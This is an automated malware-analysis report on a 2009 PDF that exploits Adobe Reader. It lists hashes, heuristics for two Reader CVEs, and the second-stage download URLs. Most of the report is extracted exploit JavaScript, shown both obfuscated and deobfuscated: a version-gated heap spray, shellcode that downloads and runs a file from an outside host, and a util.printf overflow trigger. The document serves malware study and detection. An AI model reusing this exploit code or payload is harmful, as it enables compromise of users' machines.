Malicious PDF — malware analysis report

Static analysis result for SHA-256 7abd4982933dc5c8…

MALICIOUS

PDF

56.9 KB Created: 2009-03-26 16:21:46 Authoring application: KKrWqDwBcBPTEbZkXEypu (via pXENIwJFRnOPlBMlkZ)
MD5: fca2cff90ebdab2b7122287555a7e038 SHA-1: bce632d256ec66aea0196666a0da2e38d68452f0 SHA-256: 7abd4982933dc5c89c6c88d14455ad194d41fd3456c3d9bc8877b2c9c70a8c6d
430 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

This PDF file contains embedded JavaScript that exploits multiple Adobe Reader vulnerabilities, specifically CVE-2007-5659 and CVE-2008-2992. The script is designed to download and execute a second-stage payload from the URLs http://zzz.free.hostindianet.com/load.php?id=5 and http://zzz.free.hostindianet.com/load.php?id=4. The ML classifier strongly indicates maliciousness, and the extracted JavaScript exploit kit confirms the exploitation attempt.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 10

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://zzz.free.hostindianet.com/load.php?id=5 Referenced by PDF JavaScript
    • http://zzz.free.hostindianet.com/load.php?id=4Referenced by PDF JavaScript

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0009_000.js
9d5546825f08372aa9ced46764bcc73ac2edc143d5cfe55d921c35408cda2dfc		 pdf-javascript-stream PDF /JS object 9 at offset 0x6D4 55734 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
eval(unescape('%u0076%u0061%u0072%u0020%u0067%u006b%u0037%u0068%u006c%u0036%u0032%u006e%u0039%u0020%u003d%u0020%u0061%u0070%u0070%u002e%u0076%u0069%u0065%u0077%u0065%u0072%u0056%u0065%u0072%u0073%u0069%u006f%u006e%u002e%u0074%u006f%u0053%u0074%u0072%u0069%u006e%u0067%u0028%u0029%u003b%u0067%u006b%u0037%u0068%u006c%u0036%u0032%u006e%u0039%u0020%u003d%u0020%u0067%u006b%u0037%u0068%u006c%u0036%u0032%u006e%u0039%u002e%u0072%u0065%u0070%u006c%u0061%u0063%u0065%u0028%u002f%u005c%u0044%u002f%u0067%u002c%u0022%u0022%u0029%u003b%u0069%u0066%u0028%u0067%u006b%u0037%u0068%u006c%u0036%u0032%u006e%u0039%u002e%u0063%u0068%u0061%u0072%u0041%u0074%u0028%u0030%u0029%u0020%u003d%u003d%u0020%u0022%u0038%u0022%u0020%u0026%u0026%u0020%u0067%u006b%u0037%u0068%u006c%u0036%u0032%u006e%u0039%u002e%u0063%u0068%u0061%u0072%u0041%u0074%u0028%u0031%u0029%u0020%u003c%u003d%u0020%u0022%u0031%u0022%u0020%u0026%u0026%u0020%u0067%u006b%u0037%u0068%u006c%u0036%u0032%u006e%u0039%u002e%u0063%u0068%u0061%u0072%u0041%u0074%u0028%u0032%u0029%u0020%u003c%u003d%u0020%u0022%u0032%u0022%u0029%u007b%u0076%u005a%u0061%u0053%u0030%u0041%u0069%u0041%u0048%u0020%u003d%u0020%u0075%u006e%u0065%u0073%u0063%u0061%u0070%u0065%u0028%u0022%u0025%u0075%u0035%u0033%u0035%u0030%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0035%u0032%u0035%u0031%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0035%u0037%u0035%u0036%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0039%u0063%u0035%u0035%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0030%u0030%u0065%u0038%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0030%u0030%u0030%u0030%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0035%u0064%u0030%u0030%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0065%u0064%u0038%u0033%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0033%u0031%u0030%u0064%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0036%u0034%u0063%u0030%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0034%u0030%u0030%u0033%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0037%u0038%u0033%u0030%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0038%u0062%u0030%u0063%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0030%u0063%u0034%u0030%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0037%u0030%u0038%u0062%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0061%u0064%u0031%u0063%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0034%u0030%u0038%u0062%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0065%u0062%u0030%u0038%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0038%u0062%u0030%u0039%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0033%u0034%u0034%u0030%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0034%u0030%u0038%u0064%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0038%u0062%u0037%u0063%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0033%u0063%u0034%u0030%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0035%u0037%u0035%u0036%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0035%u0065%u0062%u0065%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0030%u0030%u0030%u0031%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0030%u0031%u0030%u0030%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0062%u0066%u0065%u0065%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0030%u0031%u0034%u0065%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0030%u0030%u0030%u0030%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0065%u0066%u0030%u0031%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0064%u0036%u0065%u0038%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0030%u0030%u0030%u0031%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0035%u0066%u0030%u0030%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0038%u0039%u0035%u0065%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0038%u0031%u0065%u0061%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0035%u0065%u0063%u0032%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0030%u0030%u0030%u0031%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0035%u0032%u0030%u0030%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0038%u0030%u0036%u0038%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0030%u0030%u0030%u0030%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0066%u0066%u0030%u0030%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0034%u0065%u0039%u0035%u0022%u0020%u002b%u0020%u0022%u0025%u0075%u0030%u0030%u0030%u0031%u0022%u0020%u002b%
... (truncated)
generic_stage_recovery_000.js
983a0ed5a3982f1dde2ff9cc336ec0b750d90fda16887b87f908cab9d78a1a9a		 deobfuscated-js generic stage recovery js-unescape-u-words -> null-collapse from JavaScript object 9 at offset 0x6D4 9286 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var gk7hl62n9 = app.viewerVersion.toString();gk7hl62n9 = gk7hl62n9.replace(/\D/g,"");if(gk7hl62n9.charAt(0) == "8" && gk7hl62n9.charAt(1) <= "1" && gk7hl62n9.charAt(2) <= "2"){vZaS0AiAH = unescape("%u5350" + "%u5251" + "%u5756" + "%u9c55" + "%u00e8" + "%u0000" + "%u5d00" + "%ued83" + "%u310d" + "%u64c0" + "%u4003" + "%u7830" + "%u8b0c" + "%u0c40" + "%u708b" + "%uad1c" + "%u408b" + "%ueb08" + "%u8b09" + "%u3440" + "%u408d" + "%u8b7c" + "%u3c40" + "%u5756" + "%u5ebe" + "%u0001" + "%u0100" + "%ubfee" + "%u014e" + "%u0000" + "%uef01" + "%ud6e8" + "%u0001" + "%u5f00" + "%u895e" + "%u81ea" + "%u5ec2" + "%u0001" + "%u5200" + "%u8068" + "%u0000" + "%uff00" + "%u4e95" + "%u0001" + "%u8900" + "%u81ea" + "%u5ec2" + "%u0001" + "%u3100" + "%u01f6" + "%u8ac2" + "%u359c" + "%u0263" + "%u0000" + "%ufb80" + "%u7400" + "%u8806" + "%u321c" + "%ueb46" + "%uc6ee" + "%u3204" + "%u8900" + "%u81ea" + "%u45c2" + "%u0002" + "%u5200" + "%u95ff" + "%u0152" + "%u0000" + "%uea89" + "%uc281" + "%u0250" + "%u0000" + "%u5052" + "%u95ff" + "%u0156" + "%u0000" + "%u006a" + "%u006a" + "%uea89" + "%uc281" + "%u015e" + "%u0000" + "%u8952" + "%u81ea" + "%u78c2" + "%u0002" + "%u5200" + "%u006a" + "%ud0ff" + "%u056a" + "%uea89" + "%uc281" + "%u015e" + "%u0000" + "%uff52" + "%u5a95" + "%u0001" + "%u8900" + "%u81ea" + "%u5ec2" + "%u0001" + "%u5200" + "%u8068" + "%u0000" + "%uff00" + "%u4e95" + "%u0001" + "%u8900" + "%u81ea" + "%u5ec2" + "%u0001" + "%u3100" + "%u01f6" + "%u8ac2" + "%u359c" + "%u026e" + "%u0000" + "%ufb80" + "%u7400" + "%u8806" + "%u321c" + "%ueb46" + "%uc6ee" + "%u3204" + "%u8900" + "%u81ea" + "%u45c2" + "%u0002" + "%u5200" + "%u95ff" + "%u0152" + "%u0000" + "%uea89" + "%uc281" + "%u0250" + "%u0000" + "%u5052" + "%u95ff" + "%u0156" + "%u0000" + "%u006a" + "%u006a" + "%uea89" + "%uc281" + "%u015e" + "%u0000" + "%u8952" + "%u81ea" + "%ua6c2" + "%u0002" + "%u5200" + "%u006a" + "%ud0ff" + "%u056a" + "%uea89" + "%uc281" + "%u015e" + "%u0000" + "%uff52" + "%u5a95" + "%u0001" + "%u9d00" + "%u5f5d" + "%u5a5e" + "%u5b59" + "%uc358" + "%u0000" + "%u0000" + "%u0000" + "%u0000" + "%u0000" + "%u0000" + "%u0000" + "%u0000" + "%u6547" + "%u5474" + "%u6d65" + "%u5070" + "%u7461" + "%u4168" + "%u4c00" + "%u616f" + "%u4c64" + "%u6269" + "%u6172" + "%u7972" + "%u0041" + "%u6547" + "%u5074" + "%u6f72" + "%u4163" + "%u6464" + "%u6572" + "%u7373" + "%u5700" + "%u6e69" + "%u7845" + "%u6365" + "%ubb00" + "%uf289" + "%uf789" + "%uc030" + "%u75ae" + "%u29fd" + "%u89f7" + "%u31f9" + "%ubec0" + "%u003c" + "%u0000" + "%ub503" + "%u021b" + "%u0000" + "%uad66" + "%u8503" + "%u021b" + "%u0000" + "%u708b" + "%u8378" + "%u1cc6" + "%ub503" + "%u021b" + "%u0000" + "%ubd8d" + "%u021f" + "%u0000" + "%u03ad" + "%u1b85" + "%u0002" + "%uab00" + "%u03ad" + "%u1b85" + "%u0002" + "%u5000" + "%uadab" + "%u8503" + "%u021b" + "%u0000" + "%u5eab" + "%udb31" + "%u56ad" + "%u8503" + "%u021b" + "%u0000" + "%uc689" + "%ud789" + "%ufc51" + "%ua6f3" + "%u7459" + "%u5e04" + "%ueb43" + "%u5ee9" + "%ud193" + "%u03e0" + "%u2785" + "%u0002" + "%u3100" + "%u96f6" + "%uad66" + "%ue0c1" + "%u0302" + "%u1f85" + "%u0002" + "%u8900" + "%uadc6" + "%u8503" + "%u021b" + "%u0000" + "%uebc3" + "%u0010" + "%u0000" + "%u0000" + "%u0000" + "%u0000" + "%u0000" + "%u0000" + "%u0000" + "%u8900" + "%u1b85" + "%u0002" + "%u5600" + "%ue857" + "%uff58" + "%uffff" + "%u5e5f" + "%u01ab" + "%u80ce" + "%ubb3e" + "%u0274" + "%uedeb" + "%u55c3" + "%u4c52" + "%u4f4d" + "%u2e4e" + "%u4c44" + "%u004c" + "%u5255" + "%u444c" + "%u776f" + "%u6c6e" + "%u616f" + "%u5464" + "%u466f" + "%u6c69" + "%u4165" + "%u7000" + "%u6664" + "%u7075" + "%u2e64" + "%u7865" + "%u0065" + "%u7263" + "%u7361" + "%u2e68" + "%u6870" + "%u0070" + "%u7468" + "%u7074" + "%u2f3a" + "%u7a2f" + "%u7a7a" + "%u662e" + "%u6572" + "%u2e65" + "%u6f68" + "%u7473" + "%u6e69" + "%u6964" + "%u6e61" + "%u7465" + "%u632e" + "%u6d6f" + "%u6c2f" + "%u616f" + "%u2e64" + "%u6870" + "%u3f70" + "%u6469" + "%u353d" + "%u9000" + "");var oG61yUA7r = unescape("%u0a0a" + "%u0a0a" + "");var q5a9RUOA = 20 + vZaS0AiAH.length;while(oG61yUA7r.length < q5a9RUOA) oG61yUA7r += oG61yUA7r;var iLhCn
... (truncated)
generic_stage_recovery_001.js
710d1cacc30c0d2f03064fb2644fbdc07b4d64ef3320ea0e0cc97e2ca7efec86		 deobfuscated-js generic stage recovery js-unescape-u-words -> null-collapse -> split-literal-normalize from JavaScript object 9 at offset 0x6D4 5861 bytes
Detection
ClamAV: Js.Exploit.Shellcode-18
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var gk7hl62n9 = app.viewerVersion.toString();gk7hl62n9 = gk7hl62n9.replace(/\D/g,"");if(gk7hl62n9.charAt(0) == "8" && gk7hl62n9.charAt(1) <= "1" && gk7hl62n9.charAt(2) <= "2"){vZaS0AiAH = unescape("%u5350%u5251%u5756%u9c55%u00e8%u0000%u5d00%ued83%u310d%u64c0%u4003%u7830%u8b0c%u0c40%u708b%uad1c%u408b%ueb08%u8b09%u3440%u408d%u8b7c%u3c40%u5756%u5ebe%u0001%u0100%ubfee%u014e%u0000%uef01%ud6e8%u0001%u5f00%u895e%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u0263%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%u78c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u8900%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u026e%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%ua6c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u9d00%u5f5d%u5a5e%u5b59%uc358%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6547%u5474%u6d65%u5070%u7461%u4168%u4c00%u616f%u4c64%u6269%u6172%u7972%u0041%u6547%u5074%u6f72%u4163%u6464%u6572%u7373%u5700%u6e69%u7845%u6365%ubb00%uf289%uf789%uc030%u75ae%u29fd%u89f7%u31f9%ubec0%u003c%u0000%ub503%u021b%u0000%uad66%u8503%u021b%u0000%u708b%u8378%u1cc6%ub503%u021b%u0000%ubd8d%u021f%u0000%u03ad%u1b85%u0002%uab00%u03ad%u1b85%u0002%u5000%uadab%u8503%u021b%u0000%u5eab%udb31%u56ad%u8503%u021b%u0000%uc689%ud789%ufc51%ua6f3%u7459%u5e04%ueb43%u5ee9%ud193%u03e0%u2785%u0002" + "%u3100%u96f6%uad66%ue0c1%u0302%u1f85%u0002%u8900%uadc6%u8503%u021b%u0000%uebc3%u0010%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u8900%u1b85%u0002%u5600%ue857%uff58%uffff%u5e5f%u01ab%u80ce%ubb3e%u0274%uedeb%u55c3%u4c52%u4f4d%u2e4e%u4c44%u004c%u5255%u444c%u776f%u6c6e%u616f%u5464%u466f%u6c69%u4165%u7000%u6664%u7075%u2e64%u7865%u0065%u7263%u7361%u2e68%u6870%u0070%u7468%u7074%u2f3a%u7a2f%u7a7a%u662e%u6572%u2e65%u6f68%u7473%u6e69%u6964%u6e61%u7465%u632e%u6d6f%u6c2f%u616f%u2e64%u6870%u3f70%u6469%u353d%u9000");var oG61yUA7r = unescape("%u0a0a%u0a0a");var q5a9RUOA = 20 + vZaS0AiAH.length;while(oG61yUA7r.length < q5a9RUOA) oG61yUA7r += oG61yUA7r;var iLhCnzGw5T = oG61yUA7r.substring(0, q5a9RUOA);var qEhkZtQ4 = oG61yUA7r.substring(0, oG61yUA7r.length - q5a9RUOA);while(qEhkZtQ4.length + q5a9RUOA < 0x60000) qEhkZtQ4 = qEhkZtQ4 + qEhkZtQ4 + iLhCnzGw5T;var feBEmW7a = new Array();for(mETrDgiv = 0; mETrDgiv < 1200; mETrDgiv++){feBEmW7a[mETrDgiv] = qEhkZtQ4 + vZaS0AiAH}var s5aC68ws = "12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888";util.printf("%45000f", s5aC68ws);}else{var niqckFsTv = new Array();function tLMKOeTJ5b(iDyh5Iy6j, fnRZtJem){while(iDyh5Iy6j.length * 2 < fnRZtJem){iDyh5Iy6j += iDyh5Iy6j;}iDyh5Iy6j = iDyh5Iy6j.substring(0, fnRZtJem / 2);return iDyh5Iy6j;}var j9G2IucZ7 = 0x0c0c0c0c;var pyfPpbOS = unescape("%u5350%u5251%u5756%u9c55%u00e8%u0000%u5d00%ued83%u310d%u64c0%u4003%u7830%u8b0c%u0c40%u708b%uad1c%u408b%ueb08%u8b09%u3440%u408d%u8b7c%u3c40%u5756%u5ebe%u0001%u0100%ubfee%u014e%u0000%uef01%ud6e8%u0001%u5f00%u895e%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u0263%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0152%u0000%uea89%uc281%u0250%u0000%u5052%u95ff%u0156%u0000%u006a%u006a%uea89%uc281%u015e%u0000%u8952%u81ea%u78c2%u0002%u5200%u006a%ud0ff%u056a%uea89%uc281%u015e%u0000%uff52%u5a95%u0001%u8900%u81ea%u5ec2%u0001%u5200%u8068%u0000%uff00%u4e95%u0001%u8900%u81ea%u5ec2%u0001%u3100%u01f6%u8ac2%u359c%u026e%u0000%ufb80%u7400%u8806%u321c%ueb46%uc6ee%u3204%u8900%u81ea%u45c2%u0002%u5200%u95ff%u0
... (truncated)
generic_stage_recovery_002.js
38c703ade5e845d0d2df7738480b2fcde42b6ee20948e614c7d8f234885217fb		 deobfuscated-js generic stage recovery js-unescape-u-words -> null-collapse -> percent-decode from JavaScript object 9 at offset 0x6D4 9284 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var gk7hl62n9 = app.viewerVersion.toString();gk7hl62n9 = gk7hl62n9.replace(/\D/g,"");if(gk7hl62n9.charAt(0) == "8" && gk7hl62n9.charAt(1) <= "1" && gk7hl62n9.charAt(2) <= "2"){vZaS0AiAH = unescape("%u5350" + "%u5251" + "%u5756" + "%u9c55" + "%u00e8" + "%u0000" + "%u5d00" + "%ued83" + "%u310d" + "%u64c0" + "%u4003" + "%u7830" + "%u8b0c" + "%u0c40" + "%u708b" + "%uad1c" + "%u408b" + "%ueb08" + "%u8b09" + "%u3440" + "%u408d" + "%u8b7c" + "%u3c40" + "%u5756" + "%u5ebe" + "%u0001" + "%u0100" + "%ubfee" + "%u014e" + "%u0000" + "%uef01" + "%ud6e8" + "%u0001" + "%u5f00" + "%u895e" + "%u81ea" + "%u5ec2" + "%u0001" + "%u5200" + "%u8068" + "%u0000" + "%uff00" + "%u4e95" + "%u0001" + "%u8900" + "%u81ea" + "%u5ec2" + "%u0001" + "%u3100" + "%u01f6" + "%u8ac2" + "%u359c" + "%u0263" + "%u0000" + "%ufb80" + "%u7400" + "%u8806" + "%u321c" + "%ueb46" + "%uc6ee" + "%u3204" + "%u8900" + "%u81ea" + "%u45c2" + "%u0002" + "%u5200" + "%u95ff" + "%u0152" + "%u0000" + "%uea89" + "%uc281" + "%u0250" + "%u0000" + "%u5052" + "%u95ff" + "%u0156" + "%u0000" + "%u006a" + "%u006a" + "%uea89" + "%uc281" + "%u015e" + "%u0000" + "%u8952" + "%u81ea" + "%u78c2" + "%u0002" + "%u5200" + "%u006a" + "%ud0ff" + "%u056a" + "%uea89" + "%uc281" + "%u015e" + "%u0000" + "%uff52" + "%u5a95" + "%u0001" + "%u8900" + "%u81ea" + "%u5ec2" + "%u0001" + "%u5200" + "%u8068" + "%u0000" + "%uff00" + "%u4e95" + "%u0001" + "%u8900" + "%u81ea" + "%u5ec2" + "%u0001" + "%u3100" + "%u01f6" + "%u8ac2" + "%u359c" + "%u026e" + "%u0000" + "%ufb80" + "%u7400" + "%u8806" + "%u321c" + "%ueb46" + "%uc6ee" + "%u3204" + "%u8900" + "%u81ea" + "%u45c2" + "%u0002" + "%u5200" + "%u95ff" + "%u0152" + "%u0000" + "%uea89" + "%uc281" + "%u0250" + "%u0000" + "%u5052" + "%u95ff" + "%u0156" + "%u0000" + "%u006a" + "%u006a" + "%uea89" + "%uc281" + "%u015e" + "%u0000" + "%u8952" + "%u81ea" + "%ua6c2" + "%u0002" + "%u5200" + "%u006a" + "%ud0ff" + "%u056a" + "%uea89" + "%uc281" + "%u015e" + "%u0000" + "%uff52" + "%u5a95" + "%u0001" + "%u9d00" + "%u5f5d" + "%u5a5e" + "%u5b59" + "%uc358" + "%u0000" + "%u0000" + "%u0000" + "%u0000" + "%u0000" + "%u0000" + "%u0000" + "%u0000" + "%u6547" + "%u5474" + "%u6d65" + "%u5070" + "%u7461" + "%u4168" + "%u4c00" + "%u616f" + "%u4c64" + "%u6269" + "%u6172" + "%u7972" + "%u0041" + "%u6547" + "%u5074" + "%u6f72" + "%u4163" + "%u6464" + "%u6572" + "%u7373" + "%u5700" + "%u6e69" + "%u7845" + "%u6365" + "%ubb00" + "%uf289" + "%uf789" + "%uc030" + "%u75ae" + "%u29fd" + "%u89f7" + "%u31f9" + "%ubec0" + "%u003c" + "%u0000" + "%ub503" + "%u021b" + "%u0000" + "%uad66" + "%u8503" + "%u021b" + "%u0000" + "%u708b" + "%u8378" + "%u1cc6" + "%ub503" + "%u021b" + "%u0000" + "%ubd8d" + "%u021f" + "%u0000" + "%u03ad" + "%u1b85" + "%u0002" + "%uab00" + "%u03ad" + "%u1b85" + "%u0002" + "%u5000" + "%uadab" + "%u8503" + "%u021b" + "%u0000" + "%u5eab" + "%udb31" + "%u56ad" + "%u8503" + "%u021b" + "%u0000" + "%uc689" + "%ud789" + "%ufc51" + "%ua6f3" + "%u7459" + "%u5e04" + "%ueb43" + "%u5ee9" + "%ud193" + "%u03e0" + "%u2785" + "%u0002" + "%u3100" + "%u96f6" + "%uad66" + "%ue0c1" + "%u0302" + "%u1f85" + "%u0002" + "%u8900" + "%uadc6" + "%u8503" + "%u021b" + "%u0000" + "%uebc3" + "%u0010" + "%u0000" + "%u0000" + "%u0000" + "%u0000" + "%u0000" + "%u0000" + "%u0000" + "%u8900" + "%u1b85" + "%u0002" + "%u5600" + "%ue857" + "%uff58" + "%uffff" + "%u5e5f" + "%u01ab" + "%u80ce" + "%ubb3e" + "%u0274" + "%uedeb" + "%u55c3" + "%u4c52" + "%u4f4d" + "%u2e4e" + "%u4c44" + "%u004c" + "%u5255" + "%u444c" + "%u776f" + "%u6c6e" + "%u616f" + "%u5464" + "%u466f" + "%u6c69" + "%u4165" + "%u7000" + "%u6664" + "%u7075" + "%u2e64" + "%u7865" + "%u0065" + "%u7263" + "%u7361" + "%u2e68" + "%u6870" + "%u0070" + "%u7468" + "%u7074" + "%u2f3a" + "%u7a2f" + "%u7a7a" + "%u662e" + "%u6572" + "%u2e65" + "%u6f68" + "%u7473" + "%u6e69" + "%u6964" + "%u6e61" + "%u7465" + "%u632e" + "%u6d6f" + "%u6c2f" + "%u616f" + "%u2e64" + "%u6870" + "%u3f70" + "%u6469" + "%u353d" + "%u9000" + "");var oG61yUA7r = unescape("%u0a0a" + "%u0a0a" + "");var q5a9RUOA = 20 + vZaS0AiAH.length;while(oG61yUA7r.length < q5a9RUOA) oG61yUA7r += oG61yUA7r;var iLhCn
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.